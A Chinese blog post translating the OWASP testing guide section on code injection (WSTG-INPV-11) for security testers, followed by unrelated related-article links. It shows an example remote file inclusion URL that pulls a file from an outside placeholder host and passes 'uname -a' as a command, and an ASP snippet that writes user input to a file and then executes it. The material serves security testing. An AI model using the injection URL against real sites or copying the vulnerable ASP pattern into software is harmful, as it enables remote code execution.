4.7.11.0-代码注入测试

已于 2024-10-23 17:36:19 修改
阅读量37 收藏
点赞数
分类专栏: 4.7 输入验证测试 文章标签: web安全 1024程序员节
于 2023-10-19 09:56:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44232452/article/details/133920272
版权

代码注入测试

ID
WSTG-INPV-11

总结

本节描述了测试人员如何检查是否可以在 Web 页面上输入代码并让 Web 服务器执行它。

代码注入 测试中,测试人员提交由 Web 服务器作为动态代码或包含文件处理的输入。这些测试可以针对各种服务器端脚本引擎,例如 ASP 或 PHP。需要采用适当的输入验证和安全编码实践来防范这些攻击。

测试目标

  • 确定可以将代码注入应用程序的注入点。
  • 评估注射的严重程度。

如何测试

黑盒测试

测试 PHP 注入漏洞

使用 querystring,测试人员可以注入代码(在本例中为恶意 URL),作为包含文件的一部分进行处理:

http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a

恶意 URL 被接受为 PHP 页面的参数,该页面稍后将使用包含文件中的值。

灰盒测试

测试 ASP 代码注入漏洞

检查 ASP 代码中是否有执行函数中使用的用户输入。用户是否可以在 Data input(数据输入)字段中输入命令?在这里,ASP 代码会将输入保存到文件中,然后执行它:

<%
If not isEmpty(Request( "Data" ) ) Then
Dim fso, f
'User input Data is written to a file named data.txt
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
f.Write Request("Data") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing

'Data.txt is executed
Server.Execute( "data.txt" )

Else
%>

<form>
<input name="Data" /><input type="submit" name="Enter Data" />

</form>
<%
End If
%>)))

引用

多年收集的一些稀有软件4
weixin_34301132的博客
10-06 1万+
QQ:365543212  Geovariances产品: Geovariances Isatis 2013 1CD(地质统计学软件) Geovariances.Isatis.2016.Win64 1CD Geovariances Minestis 2016 v2.0.0Win64 1CD   软脑公司产品: 3D-Sigma for WinALL-ISO 1CD(岩土体三维应力分...
jetson上使用的todesk-v4.7.2.0-arm64.deb
06-20
这是jetson上使用的todesk远程工具,deb格式,安装即可,记得使用dpkg命令安装
渗透技巧之403绕过_指纹识别
热门推荐
N的博客
03-14 7万+
渗透技巧之403绕过_指纹识别
代码质量分析利器之SonarQube【史上最全】
05-04 8612
写在前面 随着业务的发展,程序员维护的系统会越来越庞大。原本一个简单稳定的功能,可能在迭代几次后复杂度上升,导致潜在的风险随之暴露,最终导致服务不稳定,造成业务价值的损失。因此,各位大佬们一致认为需要从源头抓起,从个人技术成长到工作流程标准化去提供系统稳定性。与此同时,我也在代码质量这个方向进行挖掘,试图通过代码质量分析去反向要求程序员提高代码编程能力,降低错误风险,这才有了今天的主角-SonarQube 文章目录写在前面背景代码质量分析的痛点调研调研结果Sonarqube介绍工作原理功能介绍项目项目-总览
ios手机fiddler代理详细步骤
weixin_40618068的博客
07-15 3589
索大镇楼,废话不多说 1.安装fildder,可以在你电脑的软件管家中下载,这里就不贴下载地址啦 2.fildder设置 Tools-Otions-HTTPS配置 connetions配置 3.安装证书 在安装fiddler的时候就会有提示安装证书,以防你安装得不对可以在这个按钮再安装一遍证书。导出证书到桌面 验证是否安装成功,点击这个能查看到刚才证书就证明安装成功啦 4. 设置fiddler代理脚本文件,这里我贴上我的,大家依葫芦画瓢,主要就是去改动source里的实际访问地址,以及r.
诊所信息管理系统设计 -C语言案例课程设计大作业
安卓精品项目源码
06-03 655
经过数个星期的C课程设计的训练,我学到了很多,最主要的一点是怎样去运用自己学过的知识,怎样去找到你所需要的资料,并在短时间把它运用到具体的实践中,运用到你所需要的方面。这个过程是很艰难的,要花费很多的时间和精力,但是,在事情过后,自己就会发现自己已经在这个过程中学到了自己想要的东西,这种获得是更深刻的。在做这个C课程设计的时候,我原先也是学的不怎么好,什么是结构体数据,什么是定义类型,怎样在一个main函数中调用别的定义函数,等等,可以说是忘得差不多了。
docker学习和进阶2023
aimcode
07-23 2441
学习docker的前提:熟悉linux基本命令和熟悉git命令。- Docker是基于Go语言实现的云开源项目。 - Docker的主要目标是“Build,Ship and Run Any App,Anywhere”,也就是通过对应用组件的封装、分发、部署、运行等生命周期的管理,使用户的APP(可以是一个WEB应用或数据库应用等等)及其运行环境能够做到“一次封装,到处运行”。 - Linux 容器技术的出现就解决了这样一个问题,而 Docker 就是在它的基础上发展过来的。
MSF从0到永恒之蓝
weixin_73865435的博客
04-04 1814
使用MSF框架从0到永恒之蓝
大据数技术之高频面试题8.0.9
qq_43668173的博客
08-05 3万+
尚硅谷大数据技术之高频面试题 (作者:尚硅谷大数据研发部) 版本:V8.0 尚硅谷大数据研发部 目录 第1章 项目涉及技术 12 1.1 Linux&Shell 12 1.1.1 Linux常用高级命令 12 1.1.2 Shell常用工具及写过的脚本 12 1.1.3 Shell中提交了一个脚本,进程号已经不知道了,但是需要kill掉这个进程,怎么操作? 12 1.1.4 Shell中单引号和双引号区别 12 1.2 Hadoop 13 1.2.1 Hadoop常用端口号 13 1.2.2 Had
编译simulatetouch的学习笔记
weixin_34050427的博客
09-20 869
写在前面的话.为什么要编译这个?因为想做个模拟点击,提供给做测试岗位的未来女朋友使用,解放测试小姑娘们的双手,但是自己很菜又搞不懂苹果底层的点击是怎做的.搜索了一下发现韩国人写的这个simulatetouch可以达到要求,但是人家已经不维护了.所以需要修改他的代码.目前只发现了这一个开源代码,可以直接手机上每一个角落,所以需要在这个基础上开发自己的模拟点击,也看到了其他人的模拟点击比如PPFak...
opencv-python-4.7.0.72-cp37-abi3-win-amd64.whl
07-27
opencv-python-4.7.0.72-cp37-abi3-win-amd64.whl
LS-PrePost-4.7.20-x64-24Aug2020_setup.zip
09-18
在这款软件的4.7.20-x64-24Aug2020版本中,我们看到了64位系统的支持,这表明它可以处理更大的内存需求,适合处理复杂且数据量庞大的工程问题。 首先,让我们详细了解一下LS-PrePost的核心功能。作为一款前处理器,...
ubuntu版todesk远程工具安装包todesk-4.7.2.0-amd64.deb
06-20
ubuntu版todesk远程工具安装包todesk_4.7.2.0_amd64.zip是一个在ubuntu16.04/18.04/20.04使用的远程桌面工具,安装用dpkg即可安装
上门预约服务小程序v4.7.66-优化部分代码.txt
03-12
上门预约服务小程序v4.7.66-优化部分代码
【网络安全】OSI网络安全体系结构
Hacker_Fuchen的博客
11-13 784
OSI安全体系结构是在开放式系统互联(OSI)参考模型的基础上,为了解决网络通信中的安全问题而提出的。随着计算机网络技术的快速发展,数据传输的安全性变得越来越重要。OSI安全体系结构的提出,旨在为网络通信提供一个标准化的安全框架,确保信息在传输过程中的机密性、完整性和可用性。国际标准化组织(ISO)在20世纪80年代提出了OSI参考模型,随后为了应对日益增长的网络安全需求,进一步发展了OSI安全体系结构。
2024年三个月自学手册 网络安全(黑客技术)
2401_85027336的博客
11-14 1016
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
《Python网络安全项目实战》项目6 编写密码工具程序
最新发布
zheng_ruiguo的专栏
11-16 1103
在密码的使用过程中,我们给出一个密码经常是弱密码,这样的密码有一定的规律可以比较容易记忆。但是使用弱密码,很容易就可以对你的密码进行破解。所以我们要编写一个密码工具程序,对给出的密码进行测试,确定这个密码是不是弱密码,是不是可以使用。并且我们给出的程序功能,需要自动生成强密码,并对密码进行测试确定不是弱密码。
网络安全等级测评师
2401_88326591的博客
11-14 365
注释:网络设备主要包括交换机和路由器,网路设备的CPU和内存使用率的峰值一般不高于设备本身处理能力的70%,通信链路中的业务流量不高于网络带宽 的70%为合适;和通信传输提出了安全控制要求,主要对象为广域网、城域网、局域网的通信传输及网络架构等,涉及的安全控制点包括网络架构、通信传输、可信验证。注释:计算机系统资源通常指的是的CPU资源、内存资源、硬盘资源和网络资源,对应到等保即是指设备的CPU(处理能力、存储空间)、网络带宽。4)结构安全是网络安全检查的重点,网络结构的安全关系到整体的安全
【网络安全】记一次APP登录爆破
anquan2233的博客
11-13 493
改写为python代码。密码 + 随机10位。
E: 命令行中有不支持的文件 ./todesk-v4.7.2.0-amd64.deb
10-25
在命令行中遇到提示`./todesk-v4.7.2.0-amd64.deb`不支持的情况,通常是因为你试图运行的是一个`.deb`格式的Linux包文件,这种文件是Debian和Ubuntu等基于 Debian 系统的发行版用于软件安装的一种自解压文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值